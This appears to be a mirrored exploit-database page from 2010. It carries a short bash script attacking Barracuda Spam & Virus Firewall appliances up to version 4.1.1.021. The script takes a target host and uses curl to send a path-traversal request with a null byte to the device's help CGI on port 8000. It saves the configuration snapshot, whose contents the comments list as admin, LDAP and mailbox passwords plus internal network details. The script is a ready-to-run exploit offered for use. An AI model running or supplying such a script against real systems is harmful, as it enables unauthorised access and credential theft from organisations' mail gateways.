Home / os / win7

[remote exploits] - Barracuda Networks Spam & Virus Fire

Posted on 27 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Barracuda Networks Spam &amp; Virus Firewall &lt;= 4.1.1.021 Configuration | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 27 Sep 2010 | Exploit category: remote exploits | Exploit author: n/a | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=================================================================== Barracuda Networks Spam &amp; Virus Firewall &lt;= 4.1.1.021 Configuration =================================================================== #!/bin/bash # Exploit by ShadowHatesYou # Shadow@SquatThis.net # # The resulting output is an SQL dump containing the Barracuda&#039;s configuration, which includes goodies such as: # # The administrative password for the BSF(system_password) # MTA LDAP passwords(mta_ldap_advanced_password) # Password for each configured mailbox(user_password) # Internal networking information(system_gateway, system_ip, system_netmask, system_primary_dns_server, system_secondary_dns_server) # if [ $# != 1 ]; then echo &quot;# Barracuda Networks Spam &amp; Virus Firewall &lt;= 4.1.1.021 Remote Configuration Retrieval&quot; echo &quot;# Use: $0 &lt;host/ip&gt; &quot; echo &quot;#&quot; exit; fi; curl http://$1:8000/cgi-mod/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00 &gt; $1.config ls -hl $1.config # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-27]</pre></body></html>

 

TOP